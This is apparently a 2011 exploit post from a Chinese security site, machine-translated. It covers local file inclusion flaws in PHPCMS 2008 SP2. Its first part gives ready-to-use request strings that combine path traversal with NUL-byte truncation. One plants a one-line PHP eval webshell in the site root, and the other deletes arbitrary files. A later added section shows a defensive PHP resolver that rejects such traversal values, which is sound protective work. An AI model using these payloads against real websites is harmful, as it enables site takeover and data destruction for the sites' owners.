PHPCMS 2008 SP2 latest local file inclusion vulnerability - vulnerability warning - the black bar safety net

ID MYHACK58:62201130077
Type myhack58
Reporter Anonymous
Modified 2011-04-12T00:00:00


PHPCMS has become one of the hardest-hit targets. Vulnerabilities keep coming, and 0-days turn up often too. Without further ado, straight to the method. Getting a shell:

Include the admin/safe.inc.php file, with the data submitted via GET.

A one-line file will be generated in the root directory.

Encrypt the following string:

$evil='i=1&m=1&f=tmdsb&action=edit_code&file_path=tmdsb.php&code=<? eval($_POST[tmdsb])?>&mod=../../admin/safe.inc.php%00';


A one-line Trojan (webshell) will be generated in the root directory.

Arbitrary file deletion vulnerability:

$evil='i=1&m=1&f=tmdsb&action=del_file&files=robots.txt&mod=../../admin/safe.inc.php%00';
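
A defensive counterpart to both strings above, added here and not taken from PHPCMS or the original post: each relies on a mod value containing ../ and a trailing NUL byte (%00) reaching a file include. The resolver below is hypothetical (the function name, directory layout and the .inc.php mapping are assumptions) and shows an allowlist plus realpath() containment check that rejects such values.

```php
<?php
// Added example: hypothetical module resolver, not PHPCMS's own code.
// Assumption: a request value "mod" (plus a file name) is mapped to
// <base>/<mod>/<file>.inc.php and the result is passed to include.

function resolve_module_file(string $baseDir, string $mod, string $file): ?string
{
    // Allowlist each component: no "/", "\", ".", "%" or NUL can pass.
    foreach ([$mod, $file] as $part) {
        if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $part)) {
            return null;
        }
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Second layer: canonicalise and require the result to stay under $base
    // (catches symlinks that point outside the module tree).
    $path = realpath($base . '/' . $mod . '/' . $file . '.inc.php');
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo tree and inputs.
$base = sys_get_temp_dir() . '/modules_demo_' . getmypid();
mkdir($base . '/news', 0700, true);
file_put_contents($base . '/news/index.inc.php', "<?php return 'ok';\n");

$cases = [
    ['news', 'index'],                          // legitimate module
    ["../../admin/safe.inc.php\0", 'tmdsb'],    // decoded form of the mod value above
    ['news', '../index'],                       // traversal in the file component
];
foreach ($cases as [$mod, $file]) {
    $ok = resolve_module_file($base, $mod, $file) !== null;
    printf("%-36s %-10s %s\n", json_encode($mod), json_encode($file), $ok ? 'allowed' : 'rejected');
}
```

PHP 5.3.4 and later reject paths containing NUL bytes in filesystem functions, which removes the %00 truncation, but the traversal itself still needs a check like this one.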